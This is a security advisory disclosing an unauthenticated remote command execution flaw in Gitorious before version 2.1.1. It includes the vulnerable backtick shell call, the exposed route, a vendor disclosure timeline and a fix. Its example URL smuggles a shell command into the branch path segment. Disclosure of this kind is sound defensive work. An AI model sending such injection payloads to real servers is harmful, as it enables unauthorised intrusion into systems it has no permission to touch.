Gitorious Remote Command Execution

`Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--+->  
  
[ Authors ]  
joernchen <joernchen () phenoelit de>  
  
Phenoelit Group (http://www.phenoelit.de)  
  
[ Affected Products ]  
Gitorious < 2.1.1 (http://gitorious.org)  
  
[ Vendor communication ]  
2012-01-16 Asking vendor for PGP key  
2012-01-17 Getting PGP key from vendor  
2012-01-17 Sending vulnerability details to vendor  
2012-01-19 Vendor replies and sends link to patch [0]  
2012-01-19 Asking if users will be informed   
2012-01-20 Vendor states that they will create a patch and let the  
users know  
2012-01-25 Asking for a timeline for the notification  
2012-01-26 Vendor replies that patched branch is pushed and users   
are informed via a mailinglist.  
2012-01-27 Release of this advisory  
  
[ Overview ]  
Gitorious is a Git repository management software written in Ruby   
on Rails.  
  
[ Description ]  
Gitorious has been found vulnerable to unauthenticated remote   
command execution.  
  
Root cause is in gitorious-mainline/lib/gitorious/git_shell.rb:  
  
def execute(command)  
Timeout.timeout(20) do  
`#{command}`  
end  
rescue Timeout::Error  
  
called by app/controllers/api/graphs_controller.rb:  
  
def graph_log(repo, type, branch = nil)  
args = [repo.full_repository_path, "--decorate=full", "-100",  
type]  
args << desplat_path(branch) if branch  
git_shell.send(:graph_log, *args)  
end  
  
where branch is user controlled via route:  
  
api.connect ':project_id/:repository_id/log/graph/*branch',  
:controller => 'graphs', :action => 'show'  
  
[ Example ]  
http://gitorious.site/project/repo/log/graph/`id>/tmp/command_exec`  
  
For convenient use of this feature have a look at [1]  
  
[ Solution ]  
Update to version 2.1.1  
  
[ References ]  
[0] https://gitorious.org/gitorious/mainline/commit/  
647aed91a4dc72e88a27476948dfbacd5d0bf7ce  
[1] http://metasploit.com/modules/exploit/multi/http/gitorious_graph  
  
[ end of file ]  
`